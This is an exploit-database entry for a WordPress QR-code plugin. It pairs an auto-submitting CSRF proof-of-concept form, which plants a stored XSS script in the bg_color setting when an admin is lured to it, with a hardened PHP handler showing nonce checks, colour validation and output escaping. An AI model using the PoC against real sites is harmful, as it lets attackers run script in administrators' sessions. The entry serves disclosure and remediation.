## https://sploitus.com/exploit?id=WPEX-ID:A70AD549-2E09-44FB-B894-4271AD4A84F6
Make a logged-in editor or admin open a page containing the payload below:

<html><form enctype="multipart/form-data" method="POST" action="https://<WordPress-Site>/wp-admin/admin.php?page=my-unique-qr-code" id="csrfpoc"><table><tr><td>checkbox-nested-2</td><td><input type="text" value="on" name="checkbox-nested-2"></td></tr>
<tr><td>bg_color</td><td><input type="text" value="&quot;&gt;&lt;/div&gt;&lt;/div&gt;&lt;script&gt;alert(/XSS/)&lt;/script&gt;" name="bg_color" size="40"></td></tr>
<tr><td>colorDark</td><td><input type="text" value="#000000" name="colorDark"></td></tr>
<tr><td>colorLight</td><td><input type="text" value="#ffffff" name="colorLight"></td></tr>
<tr><td>width</td><td><input type="text" value="200" name="width"></td></tr>
<tr><td>height</td><td><input type="text" value="200" name="height"></td></tr>
<tr><td>urlinqrcoed-submit</td><td><input type="text" value="Save" name="urlinqrcoed-submit"></td></tr>
</table></form><script>csrfpoc.submit()</script></html>
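
The PoC relies on the settings request being accepted without an anti-CSRF token and on the saved `bg_color` value being written back into the admin page unescaped. A hardened handler for the same form fields, as an added example that is not the plugin's code; the nonce action, option key, capability, default values and `myqr_*` names are assumptions:

```php
<?php
// Added example, not the plugin's code. Field names are taken from the PoC form;
// the nonce action, option key, capability, defaults and function names are assumptions.
const MYQR_NONCE  = 'myqr_save_settings'; // hypothetical nonce action
const MYQR_OPTION = 'myqr_settings';      // hypothetical option key

// Accept only #rgb / #rrggbb; anything else (such as the PoC's bg_color) becomes the default.
function myqr_color( $key, $default ) {
    $raw = isset( $_POST[ $key ] ) ? wp_unslash( $_POST[ $key ] ) : '';
    $hex = is_string( $raw ) ? sanitize_hex_color( $raw ) : null;
    return $hex ? $hex : $default;
}

// Clamp a pixel dimension to an assumed 50..1000 range.
function myqr_size( $key ) {
    $n = isset( $_POST[ $key ] ) ? absint( $_POST[ $key ] ) : 200;
    return max( 50, min( 1000, $n ) );
}

function myqr_save_settings() {
    if ( ! isset( $_POST['urlinqrcoed-submit'] ) ) {
        return;
    }
    // A form auto-submitted from another origin carries no valid nonce, so this dies.
    check_admin_referer( MYQR_NONCE );
    if ( ! current_user_can( 'manage_options' ) ) { // assumed capability
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    update_option( MYQR_OPTION, array(
        'checkbox-nested-2' => empty( $_POST['checkbox-nested-2'] ) ? '' : 'on',
        'bg_color'          => myqr_color( 'bg_color', '#ffffff' ),
        'colorDark'         => myqr_color( 'colorDark', '#000000' ),
        'colorLight'        => myqr_color( 'colorLight', '#ffffff' ),
        'width'             => myqr_size( 'width' ),
        'height'            => myqr_size( 'height' ),
    ) );
}
add_action( 'admin_init', 'myqr_save_settings' );

// Output side: emit the nonce with the form and escape stored values in attribute context.
function myqr_render_fields() {
    $s = wp_parse_args( get_option( MYQR_OPTION, array() ), array( 'bg_color' => '#ffffff' ) );
    wp_nonce_field( MYQR_NONCE );
    printf(
        '<input type="text" name="bg_color" value="%s" size="40">',
        esc_attr( $s['bg_color'] )
    );
}
```

Validation on save and escaping on output are independent controls: values stored before the fix stay in the database, so the `esc_attr()` call is what neutralizes an already-saved payload.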